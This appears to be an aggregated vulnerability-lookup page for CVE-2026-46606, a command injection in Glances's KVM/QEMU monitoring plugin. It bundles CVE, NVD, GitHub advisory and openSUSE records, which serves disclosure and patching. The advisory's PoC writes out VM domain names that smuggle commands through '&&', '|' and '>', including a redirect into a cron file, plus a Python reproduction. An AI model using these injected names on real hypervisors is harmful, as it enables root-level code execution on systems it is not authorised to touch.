CVE-2026-46606 (GCVE-0-2026-46606)
Vulnerability from cvelistv5 – Published: 2026-06-25 18:02 – Updated: 2026-06-25 18:29 – CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
| URL | Tags |
|---|---|
| https://github.com/nicolargo/glances/security/advisories/GHSA-v5r2-qh84-fjx5 | x_refsource_CONFIRM |
| https://github.com/nicolargo/glances/releases/tag/v4.5.5 | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-46606",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-25T18:29:22.087082Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-06-25T18:29:51.267Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-v5r2-qh84-fjx5"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "glances",
"vendor": "nicolargo",
"versions": [
{
"status": "affected",
"version": "\u003c 4.5.5"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances KVM/QEMU monitoring engine (glances/plugins/vms/engines/virsh.py) passes VM domain names, read directly from virsh list --all output, into f-string command templates that are processed by secure_popen(). secure_popen() is explicitly designed to interpret \u0026\u0026, |, and \u003e as shell operators. Because domain names are never sanitised before interpolation, any user with the ability to create or rename a KVM/QEMU virtual machine can execute arbitrary commands as the OS user running Glances \u2014 commonly root on hypervisor hosts. This vulnerability is fixed in 4.5.5."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-06-25T18:02:14.168Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/nicolargo/glances/security/advisories/GHSA-v5r2-qh84-fjx5",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-v5r2-qh84-fjx5"
},
{
"name": "https://github.com/nicolargo/glances/releases/tag/v4.5.5",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.5"
}
],
"source": {
"advisory": "GHSA-v5r2-qh84-fjx5",
"discovery": "UNKNOWN"
},
"title": "Glances: Command Injection via KVM/QEMU VM Domain Names in glances/plugins/vms/engines/virsh.py"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-46606",
"datePublished": "2026-06-25T18:02:14.168Z",
"dateReserved": "2026-05-15T19:34:14.011Z",
"dateUpdated": "2026-06-25T18:29:51.267Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-46606",
"date": "2026-06-26",
"epss": "0.00213",
"percentile": "0.11578"
},
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-46606\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-06-25T18:29:22.087082Z\"}}}], \"references\": [{\"url\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-v5r2-qh84-fjx5\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-06-25T18:29:46.224Z\"}}], \"cna\": {\"title\": \"Glances: Command Injection via KVM/QEMU VM Domain Names in glances/plugins/vms/engines/virsh.py\", \"source\": {\"advisory\": \"GHSA-v5r2-qh84-fjx5\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.8, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"nicolargo\", \"product\": \"glances\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 4.5.5\"}]}], \"references\": [{\"url\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-v5r2-qh84-fjx5\", \"name\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-v5r2-qh84-fjx5\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/nicolargo/glances/releases/tag/v4.5.5\", \"name\": \"https://github.com/nicolargo/glances/releases/tag/v4.5.5\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Glances is an open-source system cross-platform monitoring tool. 
Prior to 4.5.5, the Glances KVM/QEMU monitoring engine (glances/plugins/vms/engines/virsh.py) passes VM domain names, read directly from virsh list --all output, into f-string command templates that are processed by secure_popen(). secure_popen() is explicitly designed to interpret \u0026\u0026, |, and \u003e as shell operators. Because domain names are never sanitised before interpolation, any user with the ability to create or rename a KVM/QEMU virtual machine can execute arbitrary commands as the OS user running Glances \\u2014 commonly root on hypervisor hosts. This vulnerability is fixed in 4.5.5.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-78\", \"description\": \"CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-06-25T18:02:14.168Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-46606\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-06-25T18:29:51.267Z\", \"dateReserved\": \"2026-05-15T19:34:14.011Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-06-25T18:02:14.168Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-46606
Vulnerability from fkie_nvd - Published: 2026-06-25 19:16 - Updated: 2026-06-25 19:58
| Vendor | Product | Version |
|---|---|---|
| nicolargo | glances | < 4.5.5 |
{
"affected": [
{
"affectedData": [
{
"product": "glances",
"vendor": "nicolargo",
"versions": [
{
"status": "affected",
"version": "\u003c 4.5.5"
}
]
}
],
"source": "security-advisories@github.com"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances KVM/QEMU monitoring engine (glances/plugins/vms/engines/virsh.py) passes VM domain names, read directly from virsh list --all output, into f-string command templates that are processed by secure_popen(). secure_popen() is explicitly designed to interpret \u0026\u0026, |, and \u003e as shell operators. Because domain names are never sanitised before interpolation, any user with the ability to create or rename a KVM/QEMU virtual machine can execute arbitrary commands as the OS user running Glances \u2014 commonly root on hypervisor hosts. This vulnerability is fixed in 4.5.5."
}
],
"id": "CVE-2026-46606",
"lastModified": "2026-06-25T19:58:30.847",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
}
],
"ssvcV203": [
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"ssvcData": {
"id": "CVE-2026-46606",
"options": [
{
"exploitation": "poc"
},
{
"automatable": "no"
},
{
"technicalImpact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-25T18:29:22.087082Z",
"version": "2.0.3"
}
}
]
},
"published": "2026-06-25T19:16:37.380",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.5"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-v5r2-qh84-fjx5"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-v5r2-qh84-fjx5"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-78"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
GHSA-V5R2-QH84-FJX5
Vulnerability from github – Published: 2026-06-22 21:14 – Updated: 2026-06-22 21:14
Summary
The Glances KVM/QEMU monitoring engine (glances/plugins/vms/engines/virsh.py) passes VM domain names, read directly from virsh list --all output, into f-string command templates that are processed by secure_popen(). secure_popen() is explicitly designed to interpret &&, |, and > as shell operators. Because domain names are never sanitised before interpolation, any user with the ability to create or rename a KVM/QEMU virtual machine can execute arbitrary commands as the OS user running Glances — commonly root on hypervisor hosts.
Details
Affected file: glances/plugins/vms/engines/virsh.py
Direct URLs (commit 04579778e733d705898a169e049dc84772c852da):
- https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/plugins/vms/engines/virsh.py#L185
- https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/plugins/vms/engines/virsh.py#L204
The vulnerable calls are on lines 185 and 204:
# Vulnerable calls as quoted from virsh.py (commit 04579778). `domain` is the name
# parsed verbatim from `virsh list --all` output and interpolated into a single
# command string; secure_popen() later splits that string on '&&', '|' and '>',
# so any of those operators inside a VM name is honoured as a real operator.
# line 185 (update_stats)
ret_cmd = secure_popen(f'{VIRSH_PATH} {VIRSH_DOMAIN_STATS_OPTIONS} {domain}')
# line 204 (update_title)
ret_cmd = secure_popen(f'{VIRSH_PATH} {VIRSH_DOMAIN_TITLE_OPTIONS} {domain}')
domain is the name string parsed from the output of virsh list --all (line 59–78 in the same file); no sanitisation is applied to it at any point before it reaches secure_popen().
secure_popen() is defined in glances/secure.py. It explicitly splits the command string on &&, |, and > before invoking subprocess.Popen with shell=False on each part, meaning all three operators are treated as real pipeline/redirection control characters:
# glances/secure.py
# Abridged excerpt (the advisory omits the code that builds sub_cmd_split and
# sub_cmd_stdin). The key point: secure_popen() never invokes a shell
# (shell=False), but it re-implements three shell operators itself by string
# splitting, so those operators remain live in any caller-supplied text that
# reaches it unsanitised.
def secure_popen(cmd):
    ret = ''
    for c in cmd.split('&&'):  # '&&' → two separate processes
        ret += __secure_popen(c)
    return ret

def __secure_popen(cmd):
    for sub_cmd in cmd.split('|'):  # '|' → stdin/stdout piped
        # sub_cmd_split / sub_cmd_stdin are computed in the elided code
        p = Popen(sub_cmd_split, shell=False, stdin=sub_cmd_stdin, stdout=PIPE, stderr=PIPE)
        # '>' is split separately for file redirection
By contrast, actions.py sanitises process names through _sanitize_mustache_dict() before they reach secure_popen(). The vms plugin applies no such protection.
Confirmed on: x86_64 Linux, Python 3.13, Glances 4.5.5_dev1 (commit 04579778e733d705898a169e049dc84772c852da).
All three injection operators were verified:
| Operator | Effect | Confirmed |
|---|---|---|
| `&&` | Second command executes after the virsh call | Yes |
| `\|` | Output of virsh piped to injected command | Yes |
| `>` | virsh output redirected to arbitrary file | Yes |
PoC
Special configuration required
- Glances must be configured to monitor a KVM/QEMU hypervisor: the `vms` plugin must be enabled and `/usr/bin/virsh` must be installed and executable.
- The attacker must have libvirt domain-creation or domain-rename privileges (e.g. membership in the `libvirt` group, a typical default on Ubuntu/Debian/Fedora, or a cloud-platform tenant account).
- No custom `glances.conf` settings are needed beyond a working virsh setup.
Step 1 — Create a VM with a crafted domain name
Using the && operator to chain a second command:
<domain type="kvm">
  <name>productionDB &amp;&amp; touch /tmp/glances_pwned</name>
  <memory>131072</memory>
  <vcpu>1</vcpu>
  <os><type arch="x86_64">hvm</type></os>
</domain>
virsh define evil-domain.xml
Step 2 — Start Glances with KVM monitoring enabled
glances # or: glances -s / glances -w
On the next monitoring cycle Glances calls:
virsh domstats --nowait "productionDB && touch /tmp/glances_pwned"
which secure_popen() splits into two processes:
1. virsh domstats --nowait productionDB
2. touch /tmp/glances_pwned
Step 3 — Verify execution
ls -la /tmp/glances_pwned # file will exist, owned by the Glances user
Pipe injection (|) example
Domain name: "productionDB | tee /tmp/virsh_output_stolen.txt"
The output of the virsh call is piped to tee, writing the data to an attacker-controlled path.
File-write injection (>) example
Domain name: "productionDB > /etc/cron.d/glances_backdoor"
The virsh output is redirected to a cron file, enabling persistent code execution on the next cron cycle. Note that the written content is whatever virsh emits on stdout for that invocation, so the attacker controls the cron file's contents only indirectly; with `&&` available, direct command execution is the simpler route to persistence.
Minimal Python reproduction (no VM required)
import sys
sys.path.insert(0, '/path/to/glances')  # adjust to local clone
from glances.secure import secure_popen

# Simulates the exact call in virsh.py line 185.
# /bin/echo stands in for the virsh binary, so no hypervisor, libvirt or VM is
# needed; only secure_popen()'s handling of the injected operator is exercised.
domain = 'productionDB && id'
result = secure_popen(f'/bin/echo domstats --nowait {domain}')
print(result)
# Output will include two lines: the echo output AND the output of `id`
# (secure_popen() splits the string on '&&' and runs each half as its own process)
Impact
Vulnerability type: Command Injection (CWE-78)
Who is impacted: Any deployment of Glances on a KVM/QEMU hypervisor host where the vms plugin is active. Exploitation requires the attacker to have libvirt domain-creation or domain-rename rights — a privilege granted by default to members of the libvirt group and to cloud-platform tenant APIs.
Impact:
- Confidentiality: Full — arbitrary commands can exfiltrate secrets from the Glances process environment and the file system.
- Integrity: Full — file-write injection (>) allows placing content in any file writable by the Glances process (cron, authorised_keys, etc.).
- Availability: Full — the Glances process can be terminated or the host disrupted through the injected commands.
In cloud and multi-tenant virtualisation environments, Glances commonly runs as root on the hypervisor to access performance counters, so successful exploitation typically yields root-level code execution.
Suggested Fix
Replace the f-string interpolation with list-based argument passing to avoid any interaction with secure_popen()'s operator splitting logic:
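# virsh.py — replace lines 185 and 204 with subprocess.run and an explicit argument list.
# Passing argv as a list never goes through secure_popen()'s '&&' / '|' / '>' splitting,
# so a domain name containing those operators reaches virsh as one ordinary argument.
from subprocess import run, PIPE

result = run(
    [VIRSH_PATH, 'domstats', '--nowait', domain],
    stdout=PIPE, stderr=PIPE, timeout=5,
    text=True,  # secure_popen() returned str; without text=True result.stdout is bytes
)
# NOTE(review): a list argv stops shell-operator injection but not option injection —
# a name beginning with '-' could still be read by virsh as a flag. Confirm libvirt
# rejects such names, or guard for it before passing `domain`. `timeout=5` raises
# subprocess.TimeoutExpired on expiry, so the caller must handle that exception.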
Alternatively, sanitise `domain` using the same `_sanitize_mustache_dict` helper already used in `actions.py`, which strips `&&`, `|`, `>`, `;`, and backtick characters from string values. Note that stripping is a deny-list and silently changes the name that virsh is asked about, so the argument-list approach above is the more robust fix; sanitisation is best applied in addition to, not instead of, avoiding string-built commands.
As a defence-in-depth measure, consider running Glances under a dedicated low-privilege service account with `CAP_SYS_PTRACE` rather than as root. Bear in mind that `CAP_SYS_PTRACE` is itself a powerful capability (it permits inspecting other processes), so this limits rather than eliminates the blast radius; the injection itself is only closed by the code fix above.
Responsible Disclosure
The AFINE Team is committed to responsible / coordinated disclosure. The AFINE Team will not publish details of this vulnerability or release exploit code publicly until a fix has been released, or 90 days have elapsed from the date of this report, whichever comes first.
Credits
This issue was identified by Michał Majchrowicz and Marcin Wyczechowski, members of the AFINE Team.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "glances"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.5.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-46606"
],
"database_specific": {
"cwe_ids": [
"CWE-78"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-22T21:14:06Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\nThe Glances KVM/QEMU monitoring engine (`glances/plugins/vms/engines/virsh.py`) passes VM domain names, read directly from `virsh list --all` output, into f-string command templates that are processed by `secure_popen()`. `secure_popen()` is explicitly designed to interpret `\u0026\u0026`, `|`, and `\u003e` as shell operators. Because domain names are never sanitised before interpolation, any user with the ability to create or rename a KVM/QEMU virtual machine can execute arbitrary commands as the OS user running Glances \u2014 commonly root on hypervisor hosts.\n\n---\n\n### Details\n\n**Affected file:** `glances/plugins/vms/engines/virsh.py`\n\n**Direct URLs (commit 04579778e733d705898a169e049dc84772c852da):**\n- https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/plugins/vms/engines/virsh.py#L185\n- https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/plugins/vms/engines/virsh.py#L204\n\nThe vulnerable calls are on lines 185 and 204:\n\n```python\n# line 185 (update_stats)\nret_cmd = secure_popen(f\u0027{VIRSH_PATH} {VIRSH_DOMAIN_STATS_OPTIONS} {domain}\u0027)\n\n# line 204 (update_title)\nret_cmd = secure_popen(f\u0027{VIRSH_PATH} {VIRSH_DOMAIN_TITLE_OPTIONS} {domain}\u0027)\n```\n\n`domain` is the name string parsed from the output of `virsh list --all` (line 59\u201378 in the same file); no sanitisation is applied to it at any point before it reaches `secure_popen()`.\n\n`secure_popen()` is defined in `glances/secure.py`. 
It explicitly splits the command string on `\u0026\u0026`, `|`, and `\u003e` before invoking `subprocess.Popen` with `shell=False` on each part, meaning all three operators are treated as real pipeline/redirection control characters:\n\n```python\n# glances/secure.py\ndef secure_popen(cmd):\n ret = \u0027\u0027\n for c in cmd.split(\u0027\u0026\u0026\u0027): # \u0027\u0026\u0026\u0027 \u2192 two separate processes\n ret += __secure_popen(c)\n return ret\n\ndef __secure_popen(cmd):\n for sub_cmd in cmd.split(\u0027|\u0027): # \u0027|\u0027 \u2192 stdin/stdout piped\n p = Popen(sub_cmd_split, shell=False, stdin=sub_cmd_stdin, stdout=PIPE, stderr=PIPE)\n # \u0027\u003e\u0027 is split separately for file redirection\n```\n\nBy contrast, `actions.py` sanitises process names through `_sanitize_mustache_dict()` before they reach `secure_popen()`. The `vms` plugin applies no such protection.\n\n**Confirmed on:** x86_64 Linux, Python 3.13, Glances 4.5.5_dev1 (commit 04579778e733d705898a169e049dc84772c852da).\n\nAll three injection operators were verified:\n\n| Operator | Effect | Confirmed |\n|----------|--------|-----------|\n| `\u0026\u0026` | Second command executes after the virsh call | Yes |\n| `\\|` | Output of virsh piped to injected command | Yes |\n| `\u003e` | virsh output redirected to arbitrary file | Yes |\n\n---\n\n### PoC\n\n**Special configuration required**\n\n* Glances must be configured to monitor a KVM/QEMU hypervisor: the `vms` plugin must be enabled and `/usr/bin/virsh` must be installed and executable.\n* The attacker must have libvirt domain-creation or domain-rename privileges (e.g. 
membership in the `libvirt` group, a typical default on Ubuntu/Debian/Fedora, or a cloud-platform tenant account).\n* No custom `glances.conf` settings are needed beyond a working virsh setup.\n\n**Step 1 \u2014 Create a VM with a crafted domain name**\n\nUsing the `\u0026\u0026` operator to chain a second command:\n\n```xml\n\u003cdomain type=\"kvm\"\u003e\n \u003cname\u003eproductionDB \u0026amp;\u0026amp; touch /tmp/glances_pwned\u003c/name\u003e\n \u003cmemory\u003e131072\u003c/memory\u003e\n \u003cvcpu\u003e1\u003c/vcpu\u003e\n \u003cos\u003e\u003ctype arch=\"x86_64\"\u003ehvm\u003c/type\u003e\u003c/os\u003e\n\u003c/domain\u003e\n```\n\n```bash\nvirsh define evil-domain.xml\n```\n\n**Step 2 \u2014 Start Glances with KVM monitoring enabled**\n\n```bash\nglances # or: glances -s / glances -w\n```\n\nOn the next monitoring cycle Glances calls:\n\n```\nvirsh domstats --nowait \"productionDB \u0026\u0026 touch /tmp/glances_pwned\"\n```\n\nwhich `secure_popen()` splits into two processes:\n1. `virsh domstats --nowait productionDB`\n2. 
`touch /tmp/glances_pwned`\n\n**Step 3 \u2014 Verify execution**\n\n```bash\nls -la /tmp/glances_pwned # file will exist, owned by the Glances user\n```\n\n**Pipe injection (`|`) example**\n\nDomain name: `\"productionDB | tee /tmp/virsh_output_stolen.txt\"`\n\nThe output of the virsh call is piped to `tee`, writing the data to an attacker-controlled path.\n\n**File-write injection (`\u003e`) example**\n\nDomain name: `\"productionDB \u003e /etc/cron.d/glances_backdoor\"`\n\nThe virsh output is redirected to a cron file, enabling persistent code execution on the next cron cycle.\n\n**Minimal Python reproduction (no VM required)**\n\n```python\nimport sys\nsys.path.insert(0, \u0027/path/to/glances\u0027) # adjust to local clone\nfrom glances.secure import secure_popen\n\n# Simulates the exact call in virsh.py line 185\ndomain = \u0027productionDB \u0026\u0026 id\u0027\nresult = secure_popen(f\u0027/bin/echo domstats --nowait {domain}\u0027)\nprint(result)\n# Output will include two lines: the echo output AND the output of `id`\n```\n\n---\n\n### Impact\n\n**Vulnerability type:** Command Injection (CWE-78)\n\n**Who is impacted:** Any deployment of Glances on a KVM/QEMU hypervisor host where the `vms` plugin is active. 
Exploitation requires the attacker to have libvirt domain-creation or domain-rename rights \u2014 a privilege granted by default to members of the `libvirt` group and to cloud-platform tenant APIs.\n\n**Impact:**\n- **Confidentiality:** Full \u2014 arbitrary commands can exfiltrate secrets from the Glances process environment and the file system.\n- **Integrity:** Full \u2014 file-write injection (`\u003e`) allows placing content in any file writable by the Glances process (cron, authorised_keys, etc.).\n- **Availability:** Full \u2014 the Glances process can be terminated or the host disrupted through the injected commands.\n\nIn cloud and multi-tenant virtualisation environments, Glances commonly runs as root on the hypervisor to access performance counters, so successful exploitation typically yields root-level code execution.\n\n---\n\n### Suggested Fix\n\nReplace the f-string interpolation with list-based argument passing to avoid any interaction with `secure_popen()`\u0027s operator splitting logic:\n\n```python\n# virsh.py \u2014 replace lines 185 and 204 with subprocess.run and explicit arg list from subprocess import run, PIPE\n\nresult = run(\n [VIRSH_PATH, \u0027domstats\u0027, \u0027--nowait\u0027, domain],\n stdout=PIPE, stderr=PIPE, timeout=5\n)\n```\n\nAlternatively, sanitise `domain` using the same `_sanitize_mustache_dict` helper already used in `actions.py`, which strips `\u0026\u0026`, `|`, `\u003e`, `;`, and backtick characters from string values.\n\nAs a defence-in-depth measure, consider running Glances under a dedicated low-privilege service account with `CAP_SYS_PTRACE` rather than as root.\n\n---\n\n### Responsible Disclosure\n\nThe AFINE Team is committed to responsible / coordinated disclosure. 
The AFINE Team will not publish details of this vulnerability or release exploit code publicly until a fix has been released, or 90 days have elapsed from the date of this report, whichever comes first.\n\n---\n\n### Credits\n\nThis issue was identified by Micha\u0142 Majchrowicz and Marcin Wyczechowski, members\nof the AFINE Team.\n\n---",
"id": "GHSA-v5r2-qh84-fjx5",
"modified": "2026-06-22T21:14:06Z",
"published": "2026-06-22T21:14:06Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-v5r2-qh84-fjx5"
},
{
"type": "PACKAGE",
"url": "https://github.com/nicolargo/glances"
},
{
"type": "WEB",
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Glances is Vulnerable to Command Injection via KVM/QEMU VM Domain Names in glances/plugins/vms/engines/virsh.py"
}
OPENSUSE-SU-2026:11122-1
Vulnerability from csaf_opensuse - Published: 2026-06-25 00:00 - Updated: 2026-06-25 00:00
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — | — | Vendor Fix |
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — | — | Vendor Fix |
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — | — | Vendor Fix |
